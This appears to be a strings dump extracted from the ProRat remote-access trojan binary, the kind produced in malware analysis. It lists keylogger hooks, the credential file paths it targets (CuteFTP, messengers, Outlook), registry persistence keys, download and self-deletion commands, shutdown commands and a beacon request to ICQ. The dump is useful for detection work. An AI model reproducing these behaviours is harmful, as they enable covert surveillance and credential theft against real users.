@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
.rdata
P.idata
@.edata
@.rsrc
ADVAPI32.DLL
AVICAP32.DLL
COMCTL32.DLL
GDI32.DLL
OLE32.DLL
OLEAUT32.DLL
SHELL32.DLL
URLMON.DLL
WINMM.DLL
WINSPOOL.DRV
WS2_32.DLL
WSOCK32.DLL

%original file name%.exe_1540_rwx_00401000_001FB000:

Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
TFtpServerX
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbortt
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpCli4
OnProcessHeader
TSyncSmtpCli
smtp
SMTP component not ready
Uhk%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
.htPD
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException0_D
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWord$
220-ICS FTP Server ready
Addressh
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeys42E
AutoHotkeysx2E
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowState44E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
Pplugin4.dat
%s0x%1h
?Key[oku
.rd@a
KERNEL32.DLL
ADVAPI32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
.text
`.rdata
@.data
.rsrc
@.reloc
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
hodll.dll
[Windows title: "%s"]
\ktd32.atm
.HookSec
.reloc
B[* ProRat - Trojan Horse - Coded by PRO Group - Made in Turkey *]
user32.dll
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: http://www.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
www.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
